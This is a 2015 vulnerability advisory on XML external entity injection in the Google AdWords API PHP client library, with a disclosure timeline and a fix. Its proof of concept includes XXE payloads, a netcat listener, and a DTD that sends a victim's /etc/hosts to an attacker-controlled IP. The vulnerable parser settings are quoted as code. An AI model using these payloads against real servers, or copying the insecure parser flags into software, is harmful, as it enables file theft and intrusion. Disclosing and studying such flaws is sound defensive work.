Advisory URL: http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt ============================================= - Release date: 06.11.2015 - Discovered by: Dawid Golunski - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Google AdWords API client libraries - XML eXternal Entity Injection (XXE) Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries: googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely to be affected. II. BACKGROUND ------------------------- - AdWords API "The AdWords API is a collection of web services that you can use to build applications that manage AdWords accounts and their associated campaign data. While the AdWords API is based on SOAP 1.1, high-level client libraries are provided to help you develop applications more quickly." AdWords API client libraries are available for different platforms such as PHP, .NET, Java etc. These can be found at: https://developers.google.com/adwords/api/docs/clientlibraries III. INTRODUCTION ------------------------- As Google AdWords is based on SOAP protocol that uses XML to transfer the data, client API libraries should have necessary preventions against XML eXternal Entity injection attacks. However, an independent research found the necessary preventions to be lacking in several Google AdWords API client libraries, which could allow XXE attacks on applications/servers that make use of them. XXE (XML eXternal Entity) attack is an attack on an application that parses XML input from untrusted sources using incorrectly configured XML parser. The application may be forced to open arbitrary files and/or network resources. Exploiting XXE issues on PHP applications may also lead to denial of service or in some cases (when an 'expect' PHP module is installed) lead to command execution. IV. DESCRIPTION ------------------------- This advisory will focus on PHP version of the AdWords API client library. Other versions of the client library such as .NET and Java seem to be vulnerable in a similar way. googleads-php-lib contains the following function which queries WSDL from the remote google adwords server: ---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]--- protected function loadWsdl($wsdlUri, $proxy = null) { // Set proxy. if ($proxy) { $opts = array( 'http' => array( 'proxy' => $proxy, 'request_fulluri' => true ) ); $context = stream_context_get_default($opts); libxml_set_streams_context($context); } $this->dom = new DOMDocument(); $this->dom->load($wsdlUri, LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE); $this->serviceNamespace = $this->dom->documentElement->getAttribute('targetNamespace'); } ------------------------------------------------------- The function connects to the API endpoint to get the WSDL document describing the functionality of the AdWords web service in XML. For security reasons Google AdWords API can only be accessed via HTTPS. However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA), and turn the verify_peer option to ON. It uses the stream_context_get_default() to get the default context, which on all PHP versions below PHP 5.6.x (see references below) does not validate the CA by default. Because of this, applications using the AdWords API library may be tricked into retrieving data from untrusted sources pretending to be adwords.google.com. The above code does not provide any XXE injection attack prevention. It does not disable external entity processing. To make it worse, it specifically enables it via the LIBXML parameters provided to the dom->load() function so an XXE injection attack would work even on systems that have the newest and fully patched version of libxml library which does not process the entities by default. Another vulnerable part of the application is located in the code: ---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]--- public static function GetDomFromXml($xml) { set_error_handler(array('XmlUtils', 'HandleXmlError')); $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE); restore_error_handler(); return $dom; } ----------------------------------------------------- which is used by the AdsSoapClient class to process SOAP requests. It also activates the ENTITY processing even if libxml parser is set to ingore them by default. AdsSoapClient can be configured to verify SSL peer in SSL communication via the settings INI file but this option is set to off by default. These SSL settings, and the XML ENTITY processing combined make applications using the AdWords API vulnerable to XXE injection attacks. For the attack to be successful, an attacker needs to perform a MitM attack to impersonate adwords.google.com server (eg. via DNS poisoning/spoofing/proxy attacks, ARP spoofing, etc.) to inject malicious XML input. V. PROOF OF CONCEPT ------------------------- Below is a test application that makes use of the PHP Google AdWords API library. The application simply connects to the AdWords API endpoint to retrieve the WSDL document. ---[ testAPI.php ]--- <?php // Test application reading WSDL from Google AdWords set_include_path('./build_lib/WSDLInterpreter/'); require_once 'WSDLInterpreter.php'; $wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/' .'CampaignService?wsdl'; $wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null, null, "CampaignService", "v201502", "Ads_Google", "./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null); ?> --------------------- To exploit this application, an attacker needs to perform a MitM attack to impersonate adwords.google.com server, as mentioned in the introduction. For simplicity, we can add the following entry to /etc/hosts on the victim's server: 192.168.57.12 adwords.google.com to simulate a successful MitM attack where attacker successfully manages to ,for example, poison the DNS cache to point the adwords subdomain at his malicious web server (192.168.57.12). The attacker then needs to create a malicious XML file on his server to return it to the victim. Example payload could look as follows: $ curl --insecure 'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl' <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd"> ]> <test><testing>&xxetest;</testing></test> The XML payload returned by the attacker will cause the vulnerable AdWords API library to resolve the 'xxetest' entity and connect back to the attacker's server to retrieve adwords_xxe_hack.dtd. This can be verified on the victim's server by executing the demonstrated testAPI.php script: $ curl http://victims_server/googleads-php-lib-master/testAPI.php The script will try to retrieve the WSDL/XML document from adwords.google.com which will provide the above malicious XML. After the injected entity is read, the attacker will get a connection from the victim: attacker@mitm# nc -vv -l 8080 Connection from victims_server port 8080 [tcp/http-alt] accepted GET /adwords_xxe_hack.dtd HTTP/1.0 Host: 192.168.57.12:8080 At this point attacker could add other entities to carry out an Out of band XXE attack to read system files (such as /etc/passwd) located on the victim's server, or execute commands via expect:// PHP wrapper if the 'expect' module is enabled. For example, this payload: <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts"> <!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd"> %dtd; ]> <test><testing>test &send;</testing></test> with another file located on the attacker's file server: ---[ send.dtd ]--- <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.57.12:8080/retrieved/%file;'>"> %all; ------------------ would send the contents of the /etc/hosts file to the attacker. VI. BUSINESS IMPACT ------------------------- The severity of this issue is lowered to medium/high despite as the XXE injection vulnerability in the code, the attacker must impersonate adwords.google.com server to be able to inject malicious XML. If there is a possibility for such an attack, the severity of the issue can grow to high/critical due to the exploitation possibilities through XXE injection. VII. SYSTEMS AFFECTED ------------------------- The latest version of Google AdWords API PHP client library was confirmed to be vulnerable. The client libraries for other platforms seem to lack necessary XXE attack preventions too. For example, the Java version, did not set the 'sax/features/external-general-entities' setting to off when creating an instance of the DocumentBuilderFactory class. And the .NET version of the AdWords API was missing explicit 'ProhibitDtd' setting on the XMLReader. Vulnerabilities were found in googleads-php-lib in versions below 5.9.0 and reported to Google in May 2015, they were just fixed in AdWords php library ver. 6.3.0. VIII. SOLUTION ------------------------- Install the latest version of the Google AdWords API library available for your platform, and tighten SSL settings by enabling SSL CA verification in the library settings file. IX. REFERENCES ------------------------- http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt https://developers.google.com/adwords/api/docs/clientlibraries https://github.com/googleads/googleads-php-lib https://developers.google.com/adwords/api/docs/ PHP 5.6.x openssl certificates in PHP streams: http://php.net/manual/en/migration56.openssl.php http://legalhackers.com X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. TIMELINE ------------------------- May 18th, 2015: Advisory created and sent to Google Security Team Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched Nov 6th, 2015: Advisory released publicly XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.